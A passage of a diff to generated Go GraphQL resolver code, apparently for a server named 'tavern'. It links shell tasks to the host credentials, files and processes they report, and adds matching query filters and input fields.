case "creator": + return ec.fieldContext_ShellTask_creator(ctx, field) + case "reportedCredentials": + return ec.fieldContext_ShellTask_reportedCredentials(ctx, field) + case "reportedFiles": + return ec.fieldContext_ShellTask_reportedFiles(ctx, field) + case "reportedProcesses": + return ec.fieldContext_ShellTask_reportedProcesses(ctx, field) + } + return nil, fmt.Errorf("no field named %q was found under type ShellTask", field.Name) + }, + } + return fc, nil +} + func (ec *executionContext) _HostFileConnection_edges(ctx context.Context, field graphql.CollectedField, obj *ent.HostFileConnection) (ret graphql.Marshaler) { return graphql.ResolveField( ctx, @@ -5566,6 +5694,8 @@ func (ec *executionContext) fieldContext_HostFileEdge_node(_ context.Context, fi return ec.fieldContext_HostFile_host(ctx, field) case "task": return ec.fieldContext_HostFile_task(ctx, field) + case "shellTask": + return ec.fieldContext_HostFile_shellTask(ctx, field) } return nil, fmt.Errorf("no field named %q was found under type HostFile", field.Name) }, @@ -6021,9 +6151,9 @@ func (ec *executionContext) _HostProcess_task(ctx context.Context, field graphql return obj.Task(ctx) }, nil, - ec.marshalNTask2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐTask, - true, + ec.marshalOTask2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐTask, true, + false, ) } @@ -6072,6 +6202,69 @@ func (ec *executionContext) fieldContext_HostProcess_task(_ context.Context, fie return fc, nil } +func (ec *executionContext) _HostProcess_shellTask(ctx context.Context, field graphql.CollectedField, obj *ent.HostProcess) (ret graphql.Marshaler) { + return graphql.ResolveField( + ctx, + ec.OperationContext, + field, + ec.fieldContext_HostProcess_shellTask, + func(ctx context.Context) (any, error) { + return obj.ShellTask(ctx) + }, + nil, + ec.marshalOShellTask2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐShellTask, + true, + false, + ) +} + +func (ec *executionContext) fieldContext_HostProcess_shellTask(_ context.Context, field graphql.CollectedField) (fc *graphql.FieldContext, err error) { + fc = &graphql.FieldContext{ + Object: "HostProcess", + Field: field, + IsMethod: true, + IsResolver: false, + Child: func(ctx context.Context, field graphql.CollectedField) (*graphql.FieldContext, error) { + switch field.Name { + case "id": + return ec.fieldContext_ShellTask_id(ctx, field) + case "createdAt": + return ec.fieldContext_ShellTask_createdAt(ctx, field) + case "lastModifiedAt": + return ec.fieldContext_ShellTask_lastModifiedAt(ctx, field) + case "input": + return ec.fieldContext_ShellTask_input(ctx, field) + case "output": + return ec.fieldContext_ShellTask_output(ctx, field) + case "error": + return ec.fieldContext_ShellTask_error(ctx, field) + case "streamID": + return ec.fieldContext_ShellTask_streamID(ctx, field) + case "sequenceID": + return ec.fieldContext_ShellTask_sequenceID(ctx, field) + case "claimedAt": + return ec.fieldContext_ShellTask_claimedAt(ctx, field) + case "execStartedAt": + return ec.fieldContext_ShellTask_execStartedAt(ctx, field) + case "execFinishedAt": + return ec.fieldContext_ShellTask_execFinishedAt(ctx, field) + case "shell": + return ec.fieldContext_ShellTask_shell(ctx, field) + case "creator": + return ec.fieldContext_ShellTask_creator(ctx, field) + case "reportedCredentials": + return ec.fieldContext_ShellTask_reportedCredentials(ctx, field) + case "reportedFiles": + return ec.fieldContext_ShellTask_reportedFiles(ctx, field) + case "reportedProcesses": + return ec.fieldContext_ShellTask_reportedProcesses(ctx, field) + } + return nil, fmt.Errorf("no field named %q was found under type ShellTask", field.Name) + }, + } + return fc, nil +} + func (ec *executionContext) _HostProcessConnection_edges(ctx context.Context, field graphql.CollectedField, obj *ent.HostProcessConnection) (ret graphql.Marshaler) { return graphql.ResolveField( ctx, @@ -6227,6 +6420,8 @@ func (ec *executionContext) fieldContext_HostProcessEdge_node(_ context.Context, return ec.fieldContext_HostProcess_host(ctx, field) case "task": return ec.fieldContext_HostProcess_task(ctx, field) + case "shellTask": + return ec.fieldContext_HostProcess_shellTask(ctx, field) } return nil, fmt.Errorf("no field named %q was found under type HostProcess", field.Name) }, @@ -10539,92 +10734,257 @@ func (ec *executionContext) fieldContext_ShellTask_creator(_ context.Context, fi return fc, nil } -func (ec *executionContext) _ShellTaskConnection_edges(ctx context.Context, field graphql.CollectedField, obj *ent.ShellTaskConnection) (ret graphql.Marshaler) { +func (ec *executionContext) _ShellTask_reportedCredentials(ctx context.Context, field graphql.CollectedField, obj *ent.ShellTask) (ret graphql.Marshaler) { return graphql.ResolveField( ctx, ec.OperationContext, field, - ec.fieldContext_ShellTaskConnection_edges, + ec.fieldContext_ShellTask_reportedCredentials, func(ctx context.Context) (any, error) { - return obj.Edges, nil + return obj.ReportedCredentials(ctx) }, nil, - ec.marshalOShellTaskEdge2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐShellTaskEdge, + ec.marshalOHostCredential2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostCredentialᚄ, true, false, ) } -func (ec *executionContext) fieldContext_ShellTaskConnection_edges(_ context.Context, field graphql.CollectedField) (fc *graphql.FieldContext, err error) { +func (ec *executionContext) fieldContext_ShellTask_reportedCredentials(_ context.Context, field graphql.CollectedField) (fc *graphql.FieldContext, err error) { fc = &graphql.FieldContext{ - Object: "ShellTaskConnection", + Object: "ShellTask", Field: field, - IsMethod: false, + IsMethod: true, IsResolver: false, Child: func(ctx context.Context, field graphql.CollectedField) (*graphql.FieldContext, error) { switch field.Name { - case "node": - return ec.fieldContext_ShellTaskEdge_node(ctx, field) - case "cursor": - return ec.fieldContext_ShellTaskEdge_cursor(ctx, field) + case "id": + return ec.fieldContext_HostCredential_id(ctx, field) + case "createdAt": + return ec.fieldContext_HostCredential_createdAt(ctx, field) + case "lastModifiedAt": + return ec.fieldContext_HostCredential_lastModifiedAt(ctx, field) + case "principal": + return ec.fieldContext_HostCredential_principal(ctx, field) + case "secret": + return ec.fieldContext_HostCredential_secret(ctx, field) + case "kind": + return ec.fieldContext_HostCredential_kind(ctx, field) + case "host": + return ec.fieldContext_HostCredential_host(ctx, field) + case "task": + return ec.fieldContext_HostCredential_task(ctx, field) + case "shellTask": + return ec.fieldContext_HostCredential_shellTask(ctx, field) } - return nil, fmt.Errorf("no field named %q was found under type ShellTaskEdge", field.Name) + return nil, fmt.Errorf("no field named %q was found under type HostCredential", field.Name) }, } return fc, nil } -func (ec *executionContext) _ShellTaskConnection_pageInfo(ctx context.Context, field graphql.CollectedField, obj *ent.ShellTaskConnection) (ret graphql.Marshaler) { +func (ec *executionContext) _ShellTask_reportedFiles(ctx context.Context, field graphql.CollectedField, obj *ent.ShellTask) (ret graphql.Marshaler) { return graphql.ResolveField( ctx, ec.OperationContext, field, - ec.fieldContext_ShellTaskConnection_pageInfo, + ec.fieldContext_ShellTask_reportedFiles, func(ctx context.Context) (any, error) { - return obj.PageInfo, nil + return obj.ReportedFiles(ctx) }, nil, - ec.marshalNPageInfo2entgoᚗioᚋcontribᚋentgqlᚐPageInfo, - true, + ec.marshalOHostFile2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostFileᚄ, true, + false, ) } -func (ec *executionContext) fieldContext_ShellTaskConnection_pageInfo(_ context.Context, field graphql.CollectedField) (fc *graphql.FieldContext, err error) { +func (ec *executionContext) fieldContext_ShellTask_reportedFiles(_ context.Context, field graphql.CollectedField) (fc *graphql.FieldContext, err error) { fc = &graphql.FieldContext{ - Object: "ShellTaskConnection", + Object: "ShellTask", Field: field, - IsMethod: false, + IsMethod: true, IsResolver: false, Child: func(ctx context.Context, field graphql.CollectedField) (*graphql.FieldContext, error) { switch field.Name { - case "hasNextPage": - return ec.fieldContext_PageInfo_hasNextPage(ctx, field) - case "hasPreviousPage": - return ec.fieldContext_PageInfo_hasPreviousPage(ctx, field) - case "startCursor": - return ec.fieldContext_PageInfo_startCursor(ctx, field) - case "endCursor": - return ec.fieldContext_PageInfo_endCursor(ctx, field) + case "id": + return ec.fieldContext_HostFile_id(ctx, field) + case "createdAt": + return ec.fieldContext_HostFile_createdAt(ctx, field) + case "lastModifiedAt": + return ec.fieldContext_HostFile_lastModifiedAt(ctx, field) + case "path": + return ec.fieldContext_HostFile_path(ctx, field) + case "owner": + return ec.fieldContext_HostFile_owner(ctx, field) + case "group": + return ec.fieldContext_HostFile_group(ctx, field) + case "permissions": + return ec.fieldContext_HostFile_permissions(ctx, field) + case "size": + return ec.fieldContext_HostFile_size(ctx, field) + case "hash": + return ec.fieldContext_HostFile_hash(ctx, field) + case "host": + return ec.fieldContext_HostFile_host(ctx, field) + case "task": + return ec.fieldContext_HostFile_task(ctx, field) + case "shellTask": + return ec.fieldContext_HostFile_shellTask(ctx, field) } - return nil, fmt.Errorf("no field named %q was found under type PageInfo", field.Name) + return nil, fmt.Errorf("no field named %q was found under type HostFile", field.Name) }, } return fc, nil } -func (ec *executionContext) _ShellTaskConnection_totalCount(ctx context.Context, field graphql.CollectedField, obj *ent.ShellTaskConnection) (ret graphql.Marshaler) { +func (ec *executionContext) _ShellTask_reportedProcesses(ctx context.Context, field graphql.CollectedField, obj *ent.ShellTask) (ret graphql.Marshaler) { return graphql.ResolveField( ctx, ec.OperationContext, field, - ec.fieldContext_ShellTaskConnection_totalCount, + ec.fieldContext_ShellTask_reportedProcesses, func(ctx context.Context) (any, error) { - return obj.TotalCount, nil + return obj.ReportedProcesses(ctx) }, nil, - ec.marshalNInt2int, - true, + ec.marshalOHostProcess2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐHostProcessᚄ, + true, + false, + ) +} + +func (ec *executionContext) fieldContext_ShellTask_reportedProcesses(_ context.Context, field graphql.CollectedField) (fc *graphql.FieldContext, err error) { + fc = &graphql.FieldContext{ + Object: "ShellTask", + Field: field, + IsMethod: true, + IsResolver: false, + Child: func(ctx context.Context, field graphql.CollectedField) (*graphql.FieldContext, error) { + switch field.Name { + case "id": + return ec.fieldContext_HostProcess_id(ctx, field) + case "createdAt": + return ec.fieldContext_HostProcess_createdAt(ctx, field) + case "lastModifiedAt": + return ec.fieldContext_HostProcess_lastModifiedAt(ctx, field) + case "pid": + return ec.fieldContext_HostProcess_pid(ctx, field) + case "ppid": + return ec.fieldContext_HostProcess_ppid(ctx, field) + case "name": + return ec.fieldContext_HostProcess_name(ctx, field) + case "principal": + return ec.fieldContext_HostProcess_principal(ctx, field) + case "path": + return ec.fieldContext_HostProcess_path(ctx, field) + case "cmd": + return ec.fieldContext_HostProcess_cmd(ctx, field) + case "env": + return ec.fieldContext_HostProcess_env(ctx, field) + case "cwd": + return ec.fieldContext_HostProcess_cwd(ctx, field) + case "status": + return ec.fieldContext_HostProcess_status(ctx, field) + case "host": + return ec.fieldContext_HostProcess_host(ctx, field) + case "task": + return ec.fieldContext_HostProcess_task(ctx, field) + case "shellTask": + return ec.fieldContext_HostProcess_shellTask(ctx, field) + } + return nil, fmt.Errorf("no field named %q was found under type HostProcess", field.Name) + }, + } + return fc, nil +} + +func (ec *executionContext) _ShellTaskConnection_edges(ctx context.Context, field graphql.CollectedField, obj *ent.ShellTaskConnection) (ret graphql.Marshaler) { + return graphql.ResolveField( + ctx, + ec.OperationContext, + field, + ec.fieldContext_ShellTaskConnection_edges, + func(ctx context.Context) (any, error) { + return obj.Edges, nil + }, + nil, + ec.marshalOShellTaskEdge2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐShellTaskEdge, + true, + false, + ) +} + +func (ec *executionContext) fieldContext_ShellTaskConnection_edges(_ context.Context, field graphql.CollectedField) (fc *graphql.FieldContext, err error) { + fc = &graphql.FieldContext{ + Object: "ShellTaskConnection", + Field: field, + IsMethod: false, + IsResolver: false, + Child: func(ctx context.Context, field graphql.CollectedField) (*graphql.FieldContext, error) { + switch field.Name { + case "node": + return ec.fieldContext_ShellTaskEdge_node(ctx, field) + case "cursor": + return ec.fieldContext_ShellTaskEdge_cursor(ctx, field) + } + return nil, fmt.Errorf("no field named %q was found under type ShellTaskEdge", field.Name) + }, + } + return fc, nil +} + +func (ec *executionContext) _ShellTaskConnection_pageInfo(ctx context.Context, field graphql.CollectedField, obj *ent.ShellTaskConnection) (ret graphql.Marshaler) { + return graphql.ResolveField( + ctx, + ec.OperationContext, + field, + ec.fieldContext_ShellTaskConnection_pageInfo, + func(ctx context.Context) (any, error) { + return obj.PageInfo, nil + }, + nil, + ec.marshalNPageInfo2entgoᚗioᚋcontribᚋentgqlᚐPageInfo, + true, + true, + ) +} + +func (ec *executionContext) fieldContext_ShellTaskConnection_pageInfo(_ context.Context, field graphql.CollectedField) (fc *graphql.FieldContext, err error) { + fc = &graphql.FieldContext{ + Object: "ShellTaskConnection", + Field: field, + IsMethod: false, + IsResolver: false, + Child: func(ctx context.Context, field graphql.CollectedField) (*graphql.FieldContext, error) { + switch field.Name { + case "hasNextPage": + return ec.fieldContext_PageInfo_hasNextPage(ctx, field) + case "hasPreviousPage": + return ec.fieldContext_PageInfo_hasPreviousPage(ctx, field) + case "startCursor": + return ec.fieldContext_PageInfo_startCursor(ctx, field) + case "endCursor": + return ec.fieldContext_PageInfo_endCursor(ctx, field) + } + return nil, fmt.Errorf("no field named %q was found under type PageInfo", field.Name) + }, + } + return fc, nil +} + +func (ec *executionContext) _ShellTaskConnection_totalCount(ctx context.Context, field graphql.CollectedField, obj *ent.ShellTaskConnection) (ret graphql.Marshaler) { + return graphql.ResolveField( + ctx, + ec.OperationContext, + field, + ec.fieldContext_ShellTaskConnection_totalCount, + func(ctx context.Context) (any, error) { + return obj.TotalCount, nil + }, + nil, + ec.marshalNInt2int, + true, true, ) } @@ -10692,6 +11052,12 @@ func (ec *executionContext) fieldContext_ShellTaskEdge_node(_ context.Context, f return ec.fieldContext_ShellTask_shell(ctx, field) case "creator": return ec.fieldContext_ShellTask_creator(ctx, field) + case "reportedCredentials": + return ec.fieldContext_ShellTask_reportedCredentials(ctx, field) + case "reportedFiles": + return ec.fieldContext_ShellTask_reportedFiles(ctx, field) + case "reportedProcesses": + return ec.fieldContext_ShellTask_reportedProcesses(ctx, field) } return nil, fmt.Errorf("no field named %q was found under type ShellTask", field.Name) }, @@ -16205,7 +16571,7 @@ func (ec *executionContext) unmarshalInputCreateHostCredentialInput(ctx context. asMap[k] = v } - fieldsInOrder := [...]string{"principal", "secret", "kind", "hostID", "taskID"} + fieldsInOrder := [...]string{"principal", "secret", "kind", "hostID", "taskID", "shellTaskID"} for _, k := range fieldsInOrder { v, ok := asMap[k] if !ok { @@ -16247,6 +16613,13 @@ func (ec *executionContext) unmarshalInputCreateHostCredentialInput(ctx context. return it, err } it.TaskID = data + case "shellTaskID": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("shellTaskID")) + data, err := ec.unmarshalOID2ᚖint(ctx, v) + if err != nil { + return it, err + } + it.ShellTaskID = data } } @@ -16593,7 +16966,7 @@ func (ec *executionContext) unmarshalInputHostCredentialWhereInput(ctx context.C asMap[k] = v } - fieldsInOrder := [...]string{"not", "and", "or", "id", "idNEQ", "idIn", "idNotIn", "idGT", "idGTE", "idLT", "idLTE", "createdAt", "createdAtNEQ", "createdAtIn", "createdAtNotIn", "createdAtGT", "createdAtGTE", "createdAtLT", "createdAtLTE", "lastModifiedAt", "lastModifiedAtNEQ", "lastModifiedAtIn", "lastModifiedAtNotIn", "lastModifiedAtGT", "lastModifiedAtGTE", "lastModifiedAtLT", "lastModifiedAtLTE", "principal", "principalNEQ", "principalIn", "principalNotIn", "principalGT", "principalGTE", "principalLT", "principalLTE", "principalContains", "principalHasPrefix", "principalHasSuffix", "principalEqualFold", "principalContainsFold", "secret", "secretNEQ", "secretIn", "secretNotIn", "secretGT", "secretGTE", "secretLT", "secretLTE", "secretContains", "secretHasPrefix", "secretHasSuffix", "secretEqualFold", "secretContainsFold", "kind", "kindNEQ", "kindIn", "kindNotIn", "hasHost", "hasHostWith", "hasTask", "hasTaskWith"} + fieldsInOrder := [...]string{"not", "and", "or", "id", "idNEQ", "idIn", "idNotIn", "idGT", "idGTE", "idLT", "idLTE", "createdAt", "createdAtNEQ", "createdAtIn", "createdAtNotIn", "createdAtGT", "createdAtGTE", "createdAtLT", "createdAtLTE", "lastModifiedAt", "lastModifiedAtNEQ", "lastModifiedAtIn", "lastModifiedAtNotIn", "lastModifiedAtGT", "lastModifiedAtGTE", "lastModifiedAtLT", "lastModifiedAtLTE", "principal", "principalNEQ", "principalIn", "principalNotIn", "principalGT", "principalGTE", "principalLT", "principalLTE", "principalContains", "principalHasPrefix", "principalHasSuffix", "principalEqualFold", "principalContainsFold", "secret", "secretNEQ", "secretIn", "secretNotIn", "secretGT", "secretGTE", "secretLT", "secretLTE", "secretContains", "secretHasPrefix", "secretHasSuffix", "secretEqualFold", "secretContainsFold", "kind", "kindNEQ", "kindIn", "kindNotIn", "hasHost", "hasHostWith", "hasTask", "hasTaskWith", "hasShellTask", "hasShellTaskWith"} for _, k := range fieldsInOrder { v, ok := asMap[k] if !ok { @@ -17027,6 +17400,20 @@ func (ec *executionContext) unmarshalInputHostCredentialWhereInput(ctx context.C return it, err } it.HasTaskWith = data + case "hasShellTask": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("hasShellTask")) + data, err := ec.unmarshalOBoolean2ᚖbool(ctx, v) + if err != nil { + return it, err + } + it.HasShellTask = data + case "hasShellTaskWith": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("hasShellTaskWith")) + data, err := ec.unmarshalOShellTaskWhereInput2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐShellTaskWhereInputᚄ(ctx, v) + if err != nil { + return it, err + } + it.HasShellTaskWith = data } } @@ -17078,7 +17465,7 @@ func (ec *executionContext) unmarshalInputHostFileWhereInput(ctx context.Context asMap[k] = v } - fieldsInOrder := [...]string{"not", "and", "or", "id", "idNEQ", "idIn", "idNotIn", "idGT", "idGTE", "idLT", "idLTE", "createdAt", "createdAtNEQ", "createdAtIn", "createdAtNotIn", "createdAtGT", "createdAtGTE", "createdAtLT", "createdAtLTE", "lastModifiedAt", "lastModifiedAtNEQ", "lastModifiedAtIn", "lastModifiedAtNotIn", "lastModifiedAtGT", "lastModifiedAtGTE", "lastModifiedAtLT", "lastModifiedAtLTE", "path", "pathNEQ", "pathIn", "pathNotIn", "pathGT", "pathGTE", "pathLT", "pathLTE", "pathContains", "pathHasPrefix", "pathHasSuffix", "pathEqualFold", "pathContainsFold", "owner", "ownerNEQ", "ownerIn", "ownerNotIn", "ownerGT", "ownerGTE", "ownerLT", "ownerLTE", "ownerContains", "ownerHasPrefix", "ownerHasSuffix", "ownerIsNil", "ownerNotNil", "ownerEqualFold", "ownerContainsFold", "group", "groupNEQ", "groupIn", "groupNotIn", "groupGT", "groupGTE", "groupLT", "groupLTE", "groupContains", "groupHasPrefix", "groupHasSuffix", "groupIsNil", "groupNotNil", "groupEqualFold", "groupContainsFold", "permissions", "permissionsNEQ", "permissionsIn", "permissionsNotIn", "permissionsGT", "permissionsGTE", "permissionsLT", "permissionsLTE", "permissionsContains", "permissionsHasPrefix", "permissionsHasSuffix", "permissionsIsNil", "permissionsNotNil", "permissionsEqualFold", "permissionsContainsFold", "size", "sizeNEQ", "sizeIn", "sizeNotIn", "sizeGT", "sizeGTE", "sizeLT", "sizeLTE", "hash", "hashNEQ", "hashIn", "hashNotIn", "hashGT", "hashGTE", "hashLT", "hashLTE", "hashContains", "hashHasPrefix", "hashHasSuffix", "hashIsNil", "hashNotNil", "hashEqualFold", "hashContainsFold", "hasHost", "hasHostWith", "hasTask", "hasTaskWith"} + fieldsInOrder := [...]string{"not", "and", "or", "id", "idNEQ", "idIn", "idNotIn", "idGT", "idGTE", "idLT", "idLTE", "createdAt", "createdAtNEQ", "createdAtIn", "createdAtNotIn", "createdAtGT", "createdAtGTE", "createdAtLT", "createdAtLTE", "lastModifiedAt", "lastModifiedAtNEQ", "lastModifiedAtIn", "lastModifiedAtNotIn", "lastModifiedAtGT", "lastModifiedAtGTE", "lastModifiedAtLT", "lastModifiedAtLTE", "path", "pathNEQ", "pathIn", "pathNotIn", "pathGT", "pathGTE", "pathLT", "pathLTE", "pathContains", "pathHasPrefix", "pathHasSuffix", "pathEqualFold", "pathContainsFold", "owner", "ownerNEQ", "ownerIn", "ownerNotIn", "ownerGT", "ownerGTE", "ownerLT", "ownerLTE", "ownerContains", "ownerHasPrefix", "ownerHasSuffix", "ownerIsNil", "ownerNotNil", "ownerEqualFold", "ownerContainsFold", "group", "groupNEQ", "groupIn", "groupNotIn", "groupGT", "groupGTE", "groupLT", "groupLTE", "groupContains", "groupHasPrefix", "groupHasSuffix", "groupIsNil", "groupNotNil", "groupEqualFold", "groupContainsFold", "permissions", "permissionsNEQ", "permissionsIn", "permissionsNotIn", "permissionsGT", "permissionsGTE", "permissionsLT", "permissionsLTE", "permissionsContains", "permissionsHasPrefix", "permissionsHasSuffix", "permissionsIsNil", "permissionsNotNil", "permissionsEqualFold", "permissionsContainsFold", "size", "sizeNEQ", "sizeIn", "sizeNotIn", "sizeGT", "sizeGTE", "sizeLT", "sizeLTE", "hash", "hashNEQ", "hashIn", "hashNotIn", "hashGT", "hashGTE", "hashLT", "hashLTE", "hashContains", "hashHasPrefix", "hashHasSuffix", "hashIsNil", "hashNotNil", "hashEqualFold", "hashContainsFold", "hasHost", "hasHostWith", "hasTask", "hasTaskWith", "hasShellTask", "hasShellTaskWith"} for _, k := range fieldsInOrder { v, ok := asMap[k] if !ok { @@ -17869,6 +18256,20 @@ func (ec *executionContext) unmarshalInputHostFileWhereInput(ctx context.Context return it, err } it.HasTaskWith = data + case "hasShellTask": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("hasShellTask")) + data, err := ec.unmarshalOBoolean2ᚖbool(ctx, v) + if err != nil { + return it, err + } + it.HasShellTask = data + case "hasShellTaskWith": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("hasShellTaskWith")) + data, err := ec.unmarshalOShellTaskWhereInput2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐShellTaskWhereInputᚄ(ctx, v) + if err != nil { + return it, err + } + it.HasShellTaskWith = data } } @@ -17958,7 +18359,7 @@ func (ec *executionContext) unmarshalInputHostProcessWhereInput(ctx context.Cont asMap[k] = v } - fieldsInOrder := [...]string{"not", "and", "or", "id", "idNEQ", "idIn", "idNotIn", "idGT", "idGTE", "idLT", "idLTE", "createdAt", "createdAtNEQ", "createdAtIn", "createdAtNotIn", "createdAtGT", "createdAtGTE", "createdAtLT", "createdAtLTE", "lastModifiedAt", "lastModifiedAtNEQ", "lastModifiedAtIn", "lastModifiedAtNotIn", "lastModifiedAtGT", "lastModifiedAtGTE", "lastModifiedAtLT", "lastModifiedAtLTE", "pid", "pidNEQ", "pidIn", "pidNotIn", "pidGT", "pidGTE", "pidLT", "pidLTE", "ppid", "ppidNEQ", "ppidIn", "ppidNotIn", "ppidGT", "ppidGTE", "ppidLT", "ppidLTE", "name", "nameNEQ", "nameIn", "nameNotIn", "nameGT", "nameGTE", "nameLT", "nameLTE", "nameContains", "nameHasPrefix", "nameHasSuffix", "nameEqualFold", "nameContainsFold", "principal", "principalNEQ", "principalIn", "principalNotIn", "principalGT", "principalGTE", "principalLT", "principalLTE", "principalContains", "principalHasPrefix", "principalHasSuffix", "principalEqualFold", "principalContainsFold", "path", "pathNEQ", "pathIn", "pathNotIn", "pathGT", "pathGTE", "pathLT", "pathLTE", "pathContains", "pathHasPrefix", "pathHasSuffix", "pathIsNil", "pathNotNil", "pathEqualFold", "pathContainsFold", "cmd", "cmdNEQ", "cmdIn", "cmdNotIn", "cmdGT", "cmdGTE", "cmdLT", "cmdLTE", "cmdContains", "cmdHasPrefix", "cmdHasSuffix", "cmdIsNil", "cmdNotNil", "cmdEqualFold", "cmdContainsFold", "env", "envNEQ", "envIn", "envNotIn", "envGT", "envGTE", "envLT", "envLTE", "envContains", "envHasPrefix", "envHasSuffix", "envIsNil", "envNotNil", "envEqualFold", "envContainsFold", "cwd", "cwdNEQ", "cwdIn", "cwdNotIn", "cwdGT", "cwdGTE", "cwdLT", "cwdLTE", "cwdContains", "cwdHasPrefix", "cwdHasSuffix", "cwdIsNil", "cwdNotNil", "cwdEqualFold", "cwdContainsFold", "status", "statusNEQ", "statusIn", "statusNotIn", "hasHost", "hasHostWith", "hasTask", "hasTaskWith"} + fieldsInOrder := [...]string{"not", "and", "or", "id", "idNEQ", "idIn", "idNotIn", "idGT", "idGTE", "idLT", "idLTE", "createdAt", "createdAtNEQ", "createdAtIn", "createdAtNotIn", "createdAtGT", "createdAtGTE", "createdAtLT", "createdAtLTE", "lastModifiedAt", "lastModifiedAtNEQ", "lastModifiedAtIn", "lastModifiedAtNotIn", "lastModifiedAtGT", "lastModifiedAtGTE", "lastModifiedAtLT", "lastModifiedAtLTE", "pid", "pidNEQ", "pidIn", "pidNotIn", "pidGT", "pidGTE", "pidLT", "pidLTE", "ppid", "ppidNEQ", "ppidIn", "ppidNotIn", "ppidGT", "ppidGTE", "ppidLT", "ppidLTE", "name", "nameNEQ", "nameIn", "nameNotIn", "nameGT", "nameGTE", "nameLT", "nameLTE", "nameContains", "nameHasPrefix", "nameHasSuffix", "nameEqualFold", "nameContainsFold", "principal", "principalNEQ", "principalIn", "principalNotIn", "principalGT", "principalGTE", "principalLT", "principalLTE", "principalContains", "principalHasPrefix", "principalHasSuffix", "principalEqualFold", "principalContainsFold", "path", "pathNEQ", "pathIn", "pathNotIn", "pathGT", "pathGTE", "pathLT", "pathLTE", "pathContains", "pathHasPrefix", "pathHasSuffix", "pathIsNil", "pathNotNil", "pathEqualFold", "pathContainsFold", "cmd", "cmdNEQ", "cmdIn", "cmdNotIn", "cmdGT", "cmdGTE", "cmdLT", "cmdLTE", "cmdContains", "cmdHasPrefix", "cmdHasSuffix", "cmdIsNil", "cmdNotNil", "cmdEqualFold", "cmdContainsFold", "env", "envNEQ", "envIn", "envNotIn", "envGT", "envGTE", "envLT", "envLTE", "envContains", "envHasPrefix", "envHasSuffix", "envIsNil", "envNotNil", "envEqualFold", "envContainsFold", "cwd", "cwdNEQ", "cwdIn", "cwdNotIn", "cwdGT", "cwdGTE", "cwdLT", "cwdLTE", "cwdContains", "cwdHasPrefix", "cwdHasSuffix", "cwdIsNil", "cwdNotNil", "cwdEqualFold", "cwdContainsFold", "status", "statusNEQ", "statusIn", "statusNotIn", "hasHost", "hasHostWith", "hasTask", "hasTaskWith", "hasShellTask", "hasShellTaskWith"} for _, k := range fieldsInOrder { v, ok := asMap[k] if !ok { @@ -18924,6 +19325,20 @@ func (ec *executionContext) unmarshalInputHostProcessWhereInput(ctx context.Cont return it, err } it.HasTaskWith = data + case "hasShellTask": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("hasShellTask")) + data, err := ec.unmarshalOBoolean2ᚖbool(ctx, v) + if err != nil { + return it, err + } + it.HasShellTask = data + case "hasShellTaskWith": + ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("hasShellTaskWith")) + data, err := ec.unmarshalOShellTaskWhereInput2ᚕᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐShellTaskWhereInputᚄ(ctx, v) + if err != nil { + return it, err + } + it.HasShellTaskWith = data } } @@ -22023,7 +22438,7 @@ func (ec *executionContext) unmarshalInputShellTaskWhereInput(ctx context.Contex asMap[k] = v } - fieldsInOrder := [...]string{"not", "and", "or", "id", "idNEQ", "idIn", "idNotIn", "idGT", "idGTE", "idLT", "idLTE", "createdAt", "createdAtNEQ", "createdAtIn", "createdAtNotIn", "createdAtGT", "createdAtGTE", "createdAtLT", "createdAtLTE", "lastModifiedAt", "lastModifiedAtNEQ", "lastModifiedAtIn", "lastModifiedAtNotIn", "lastModifiedAtGT", "lastModifiedAtGTE", "lastModifiedAtLT", "lastModifiedAtLTE", "input", "inputNEQ", "inputIn", "inputNotIn", "inputGT", "inputGTE", "inputLT", "inputLTE", "inputContains", "inputHasPrefix", "inputHasSuffix", "inputEqualFold", "inputContainsFold", "output", "outputNEQ", "outputIn", "outputNotIn", "outputGT", "outputGTE", "outputLT", "outputLTE", "outputContains", "outputHasPrefix", "outputHasSuffix", "outputIsNil", "outputNotNil", "outputEqualFold", "outputContainsFold", "error", "errorNEQ", "errorIn", "errorNotIn", "errorGT", "errorGTE", "errorLT", "errorLTE", "errorContains", "errorHasPrefix", "errorHasSuffix", "errorIsNil", "errorNotNil", "errorEqualFold", "errorContainsFold", "streamID", "streamIDNEQ", "streamIDIn", "streamIDNotIn", "streamIDGT", "streamIDGTE", "streamIDLT", "streamIDLTE", "streamIDContains", "streamIDHasPrefix", "streamIDHasSuffix", "streamIDEqualFold", "streamIDContainsFold", "sequenceID", "sequenceIDNEQ", "sequenceIDIn", "sequenceIDNotIn", "sequenceIDGT", "sequenceIDGTE", "sequenceIDLT", "sequenceIDLTE", "claimedAt", "claimedAtNEQ", "claimedAtIn", "claimedAtNotIn", "claimedAtGT", "claimedAtGTE", "claimedAtLT", "claimedAtLTE", "claimedAtIsNil", "claimedAtNotNil", "execStartedAt", "execStartedAtNEQ", "execStartedAtIn", "execStartedAtNotIn", "execStartedAtGT", "execStartedAtGTE", "execStartedAtLT", "execStartedAtLTE", "execStartedAtIsNil", "execStartedAtNotNil", "execFinishedAt", "execFinishedAtNEQ", "execFinishedAtIn", "execFinishedAtNotIn", "execFinishedAtGT", "execFinishedAtGTE", "execFinishedAtLT", "execFinishedAtLTE", "execFinishedAtIsNil", "execFinishedAtNotNil", "hasShell", "hasShellWith", "hasCreator", "hasCreatorWith"} + fieldsInOrder := [...]string{"not", "and", "or", "id", "idNEQ", "idIn", "idNotIn", "idGT", "idGTE", "idLT", "idLTE", "createdAt", "createdAtNEQ", "createdAtIn", "createdAtNotIn", "createdAtGT", "createdAtGTE", "createdAtLT", "createdAtLTE", "lastModifiedAt", "lastModifiedAtNEQ", "lastModifiedAtIn", 